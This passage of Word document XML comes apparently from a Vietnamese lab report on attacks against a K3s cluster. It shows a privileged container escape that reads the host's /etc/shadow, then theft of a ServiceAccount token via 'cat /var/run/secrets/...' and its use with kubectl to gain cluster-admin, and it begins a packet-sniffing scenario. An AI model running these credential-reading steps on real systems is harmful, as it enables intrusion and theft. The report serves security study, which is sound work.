      <w:r w:rsidRPr="001A486E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cap_sys_rawio</w:t>
      </w:r>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A486E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$\rightarrow$</w:t>
      </w:r>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E973B6" w14:textId="77777777" w:rsidR="008A233C" w:rsidRDefault="001A486E" w:rsidP="008A233C">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="001A486E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BAFB78A" wp14:editId="33D3C38C">
            <wp:extent cx="4872975" cy="1125940"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="133454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49851" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4884136" cy="1128519"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0732C02A" w14:textId="51292A97" w:rsidR="001A486E" w:rsidRPr="009823E1" w:rsidRDefault="008A233C" w:rsidP="008A233C">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc236001534"/>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6</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008A233C">
        <w:t>. Hacker chạy lệnh kiểm tra các đặc quyền</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w14:paraId="01BA3CFA" w14:textId="4EE005E9" w:rsidR="001A486E" w:rsidRPr="008A233C" w:rsidRDefault="008D58A8" w:rsidP="001A486E">
      <w:r w:rsidRPr="008A233C">
        <w:lastRenderedPageBreak/>
        <w:t>Xác nhận container đang chạy ở chế độ nguy hiểm --privileged.</w:t>
      </w:r>
      <w:r w:rsidR="00E91F60">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A233C">
        <w:t xml:space="preserve">Liệt kê ổ đĩa của Host cứng: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D8F042" w14:textId="70109D17" w:rsidR="001A486E" w:rsidRPr="009823E1" w:rsidRDefault="008D58A8" w:rsidP="001A486E">
      <w:r w:rsidRPr="009823E1">
        <w:t xml:space="preserve">Kẻ tấn công </w:t>
      </w:r>
      <w:r w:rsidR="00CE45D9" w:rsidRPr="009823E1">
        <w:t>thực hiện lệnh để thoát container để truy nhập vào host worker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141AD771" w14:textId="0F5160F2" w:rsidR="00D37F05" w:rsidRDefault="00CE45D9" w:rsidP="00CE45D9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AC20A76" wp14:editId="1FB2741C">
            <wp:extent cx="3067050" cy="587739"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1480343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43449" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3090166" cy="592169"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D3ADDE" w14:textId="6B57467A" w:rsidR="00D37F05" w:rsidRPr="008D58A8" w:rsidRDefault="00CE45D9" w:rsidP="0043452B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kết quả hiển thị trên màn hình chứng tỏ</w:t>
      </w:r>
      <w:r w:rsidR="00644A4E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> hacker </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đã thoát chuồng (Container Escape) và can thiệp thành công vào máy Host Worker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Hacker có thể thực thi các lệnh để thu thập thông tin nhạy cảm từ Worker node với đặc quyền. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FDFB3F" w14:textId="04774FB1" w:rsidR="00CE45D9" w:rsidRDefault="008D58A8" w:rsidP="009E0111">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc235976382"/>
      <w:r w:rsidRPr="009E0111">
        <w:t>Kết quả thực nghiệm đạt được</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w14:paraId="6F0EA955" w14:textId="23BE7B3F" w:rsidR="0043452B" w:rsidRPr="009823E1" w:rsidRDefault="0043452B" w:rsidP="0043452B">
      <w:r w:rsidRPr="0043452B">
        <w:t>Ngay sau khi lệnh chroot thực thi, không gian gốc của container bị phá vỡ hoàn toàn. Để chứng minh hành vi thoát chuồng chiếm quyền máy chủ vật lý thành công, kẻ tấn công thực hiện hai lệnh phá hoại cốt lõi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357EBE8E" w14:textId="56A47A7C" w:rsidR="0043452B" w:rsidRPr="009823E1" w:rsidRDefault="0043452B" w:rsidP="0043452B">
      <w:r w:rsidRPr="0043452B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Đọc file mật khẩu hệ thống:</w:t>
      </w:r>
      <w:r w:rsidRPr="0043452B">
        <w:t xml:space="preserve"> Thực hiện lệnh cat /etc/shadow để trích xuất file băm mật khẩu của máy Host. Kết quả màn hình hiển thị toàn bộ chuỗi hash đóng băng của các tài khoản Node:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D9058D" w14:textId="77777777" w:rsidR="008A233C" w:rsidRDefault="0043452B" w:rsidP="008A233C">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE45D9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02B7D75C" wp14:editId="0962A36A">
            <wp:extent cx="3466531" cy="2703420"/>
            <wp:effectExtent l="0" t="0" r="635" b="1905"/>
            <wp:docPr id="190042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23490" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3492120" cy="2723376"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="624499AB" w14:textId="4AD30D74" w:rsidR="0043452B" w:rsidRPr="008A233C" w:rsidRDefault="008A233C" w:rsidP="008A233C">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc236001535"/>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7</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008A233C">
        <w:t>. Kết quả việc hacker trích xuất file nhạy cảm trên máy host</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w14:paraId="7ECF647C" w14:textId="248076B9" w:rsidR="0043452B" w:rsidRPr="008A233C" w:rsidRDefault="0043452B" w:rsidP="0043452B">
      <w:r w:rsidRPr="008A233C">
        <w:lastRenderedPageBreak/>
        <w:t>Xác thực hệ điều hành Node: Thực hiện lệnh cat /etc/os-release, kết quả trả về thông tin hệ điều hành của máy Node là Ubuntu 22.04 LTS (thay vì ảnh gốc Debian của container), xác nhận kẻ tấn công đã thoát ranh giới cô lập, sở hữu quyền root tối cao trên máy chủ vật lý, có toàn quyền can thiệp nhân hệ thống hoặc tắt bỏ hạ tầng Node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E66347" w14:textId="77777777" w:rsidR="008A233C" w:rsidRDefault="0043452B" w:rsidP="008A233C">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0043452B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5615B4CA" wp14:editId="04853A19">
            <wp:extent cx="4641838" cy="1487606"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="896549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50534" cy="1490393"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FB6BB3" w14:textId="449894B1" w:rsidR="0043452B" w:rsidRPr="008A233C" w:rsidRDefault="008A233C" w:rsidP="008A233C">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc236001536"/>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8</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008A233C">
        <w:t>. Hình ảnh chứng minh việc hacker đã thực sự escape ra ngoài máy host</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w14:paraId="0646FFB8" w14:textId="6E256462" w:rsidR="00026BE1" w:rsidRPr="00D64E0A" w:rsidRDefault="00026BE1" w:rsidP="00D64E0A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_Toc235976383"/>
      <w:r w:rsidRPr="00D64E0A">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:b/>
        </w:rPr>
        <w:t>Kịch bản T</w:t>
      </w:r>
      <w:r w:rsidR="00C50BFB" w:rsidRPr="00D64E0A">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:b/>
        </w:rPr>
        <w:t>N-0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D64E0A">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:b/>
        </w:rPr>
        <w:t>2: Đánh cắp Service Account Token để chiếm quyền cụm Kubernetes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w14:paraId="762AD548" w14:textId="494CC8E7" w:rsidR="00C32400" w:rsidRPr="00D64E0A" w:rsidRDefault="00C32400" w:rsidP="00D64E0A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc235976384"/>
      <w:r w:rsidRPr="00D64E0A">
        <w:t>Mục tiêu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w14:paraId="319E89D1" w14:textId="77777777" w:rsidR="00C32400" w:rsidRPr="009823E1" w:rsidRDefault="00C32400" w:rsidP="00C32400">
      <w:r w:rsidRPr="009823E1">
        <w:t>Lợi dụng Token định danh (ServiceAccount) được gắn mặc định trong Pod Frontend để chiếm quyền quản trị tối cao (Cluster Admin) của toàn bộ cụm máy chủ K3s từ xa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D17A72" w14:textId="486F2CFA" w:rsidR="00C32400" w:rsidRPr="00D64E0A" w:rsidRDefault="00C32400" w:rsidP="00D64E0A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc235976385"/>
      <w:r w:rsidRPr="00D64E0A">
        <w:t>Điều kiện kích hoạt lỗi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w14:paraId="04534514" w14:textId="77777777" w:rsidR="00C32400" w:rsidRPr="009823E1" w:rsidRDefault="00C32400" w:rsidP="00C32400">
      <w:r w:rsidRPr="009823E1">
        <w:t>Quản trị viên liên kết tài khoản dịch vụ của Pod Frontend với quyền Admin của toàn cụm thông qua một ClusterRoleBinding quá lỏng lẻo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194D44F9" w14:textId="77777777" w:rsidR="008A233C" w:rsidRDefault="00C32400" w:rsidP="008A233C">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00C32400">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AE492CC" wp14:editId="7429E87E">
            <wp:extent cx="4775176" cy="571500"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="33568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83246" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4778983" cy="571956"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4A96DD" w14:textId="781FC569" w:rsidR="00C32400" w:rsidRPr="008A233C" w:rsidRDefault="008A233C" w:rsidP="008A233C">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Toc236001537"/>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9</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008A233C">
        <w:t>. Cấu hình không đảm bảo an toàn của pod Web</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w14:paraId="15CC252A" w14:textId="69DBA4A1" w:rsidR="00C32400" w:rsidRPr="00D64E0A" w:rsidRDefault="00C32400" w:rsidP="00D64E0A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc235976386"/>
      <w:r w:rsidRPr="00D64E0A">
        <w:lastRenderedPageBreak/>
        <w:t>Quy trình thực hiện chi tiết</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p w14:paraId="6C42B136" w14:textId="53BA6E75" w:rsidR="00C32400" w:rsidRPr="009823E1" w:rsidRDefault="00C32400" w:rsidP="00C32400">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009823E1">
        <w:t xml:space="preserve">    Khai thác và Đánh cắp Token mật: Kẻ tấn công sử dụng phiên shell chiếm được từ lỗi Command Injection ở TN-01, truy cập vào đường dẫn lưu trữ token nội bộ của Kubernetes để trích xuất khóa cấu hình:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8780"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C32400" w14:paraId="6CB31235" w14:textId="77777777" w:rsidTr="00C32400">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8780" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4FC2513B" w14:textId="28C82FF8" w:rsidR="00C32400" w:rsidRPr="00C32400" w:rsidRDefault="00C32400" w:rsidP="00C32400">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C32400">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
              <w:t>cat /var/run/secrets/kubernetes.io/serviceaccount/token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D78A633" w14:textId="77777777" w:rsidR="008A233C" w:rsidRDefault="00690E86" w:rsidP="008A233C">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:hanging="142"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00690E86">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31A131F0" wp14:editId="5AE7791B">
            <wp:extent cx="5830668" cy="609600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="130036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6594" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5837164" cy="610279"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BE241C" w14:textId="4B64C1B6" w:rsidR="00690E86" w:rsidRPr="008A233C" w:rsidRDefault="008A233C" w:rsidP="008A233C">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_Toc236001538"/>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10</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008A233C">
        <w:t>. Token bị hacker lấy được trong quá trình khai thác</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p w14:paraId="1A8D0BC1" w14:textId="6874ED3D" w:rsidR="00C32400" w:rsidRPr="008A233C" w:rsidRDefault="00C32400" w:rsidP="00C32400">
      <w:r w:rsidRPr="008A233C">
        <w:t>Kẻ tấn công sao chép (Copy) toàn bộ chuỗi token siêu dài mã hóa dạng JWT (bắt đầu bằng eyJ...) hiển thị trên màn hình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041567FB" w14:textId="3183C1B9" w:rsidR="00690E86" w:rsidRPr="009823E1" w:rsidRDefault="00690E86" w:rsidP="00C32400">
      <w:r w:rsidRPr="00690E86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cấu hình Kubectl từ xa trên máy Kali:</w:t>
      </w:r>
      <w:r w:rsidRPr="00690E86">
        <w:t xml:space="preserve"> Mở một Terminal độc lập trên máy Kali Linux, kẻ tấn công nạp Token trộm được và IP thật của API Server (Master Node) vào biến môi trường:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5697D1" w14:textId="66EB5B92" w:rsidR="00690E86" w:rsidRPr="009823E1" w:rsidRDefault="00690E86" w:rsidP="00C32400">
      <w:r w:rsidRPr="00690E86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chiếm quyền điều khiển thực tế:</w:t>
      </w:r>
      <w:r w:rsidRPr="00690E86">
        <w:t xml:space="preserve"> Kẻ tấn công ra lệnh cho cụm K3s thông qua công cụ kubectl</w:t>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8780"/>
      </w:tblGrid>
      <w:tr w:rsidR="00690E86" w14:paraId="6CB54700" w14:textId="77777777" w:rsidTr="00690E86">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8780" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0A43F907" w14:textId="5CD0C0F4" w:rsidR="00690E86" w:rsidRPr="00690E86" w:rsidRDefault="00690E86" w:rsidP="00C32400">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00690E86">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>kubectl --server=$MASTER_URL --token=$TOKEN --insecure-skip-tls-verify get nodes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F1CEC01" w14:textId="77777777" w:rsidR="008A233C" w:rsidRDefault="00690E86" w:rsidP="008A233C">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00690E86">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30D61260" wp14:editId="4CC51FCD">
            <wp:extent cx="4933950" cy="995210"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1231008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08821" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4964747" cy="1001422"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18835ED2" w14:textId="5267F847" w:rsidR="00690E86" w:rsidRPr="008A233C" w:rsidRDefault="008A233C" w:rsidP="008A233C">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc236001539"/>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11</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008A233C">
        <w:t>. Hình ảnh chứng minh hacker đã thực sự chiếm được quyền quản trị cluster</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w14:paraId="40D6EE97" w14:textId="4CB03645" w:rsidR="00690E86" w:rsidRPr="00D64E0A" w:rsidRDefault="00690E86" w:rsidP="00D64E0A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_Toc235976387"/>
      <w:r w:rsidRPr="00D64E0A">
        <w:t>Kết quả thực nghiệm đạt được</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p w14:paraId="2AD5BB19" w14:textId="5DC46057" w:rsidR="0043452B" w:rsidRPr="009823E1" w:rsidRDefault="00690E86" w:rsidP="0043452B">
      <w:r w:rsidRPr="009823E1">
        <w:t xml:space="preserve">Màn hình máy Kali Linux in ra danh sách toàn bộ các node master01 và worker01 ở trạng thái Ready. </w:t>
      </w:r>
      <w:r w:rsidR="0043452B" w:rsidRPr="009823E1">
        <w:t xml:space="preserve">Với quyền cluster-admin có được, tin tặc đã chiếm quyền kiểm soát tối cao toàn bộ Cluster, có khả năng xóa bỏ các Pod ứng dụng của </w:t>
      </w:r>
      <w:r w:rsidR="0043452B" w:rsidRPr="009823E1">
        <w:lastRenderedPageBreak/>
        <w:t>doanh nghiệp, khởi tạo các Pod độc hại để đào tiền ảo, hoặc đánh cắp toàn bộ cơ sở dữ liệu lưu trữ (Secrets/ConfigMaps) từ xa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF4C0FB" w14:textId="77777777" w:rsidR="00DD1DE0" w:rsidRPr="00D64E0A" w:rsidRDefault="00026BE1" w:rsidP="00D64E0A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_Toc235976388"/>
      <w:r w:rsidRPr="00D64E0A">
        <w:t>Kịch bản T</w:t>
      </w:r>
      <w:r w:rsidR="00C50BFB" w:rsidRPr="00D64E0A">
        <w:t>N-0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D64E0A">
        <w:t>3: Tấn công liên quan đến lớp mạng mạng nội bộ (Container Networking)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w14:paraId="1CD62A29" w14:textId="71C58451" w:rsidR="00DD1DE0" w:rsidRPr="00D64E0A" w:rsidRDefault="00DD1DE0" w:rsidP="00D64E0A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="_Toc235976389"/>
      <w:r w:rsidRPr="00D64E0A">
        <w:t>Mục tiêu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w14:paraId="5F1C22B0" w14:textId="77777777" w:rsidR="00DD1DE0" w:rsidRDefault="00DD1DE0" w:rsidP="00DD1DE0">
      <w:r>
        <w:t>Khai thác kiến trúc mạng phẳng mặc định (không có tường lửa cô lập Pod) để tiến hành bắt và phân tích gói tin (Sniffing), đánh cắp thông tin thẻ tín dụng nhạy cảm truyền tải dưới dạng văn bản thô (Plaintext) giữa các dịch vụ vi mô lân cận.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556B91D4" w14:textId="0D6948C5" w:rsidR="00DD1DE0" w:rsidRPr="00D64E0A" w:rsidRDefault="00DD1DE0" w:rsidP="00D64E0A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc235976390"/>
      <w:r w:rsidRPr="00D64E0A">
        <w:t>Cấu trúc dịch vụ giả lập phục vụ Lab</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w14:paraId="0F8A5315" w14:textId="6A4E72EB" w:rsidR="00DD1DE0" w:rsidRPr="00010541" w:rsidRDefault="00DD1DE0" w:rsidP="00DD1DE0">
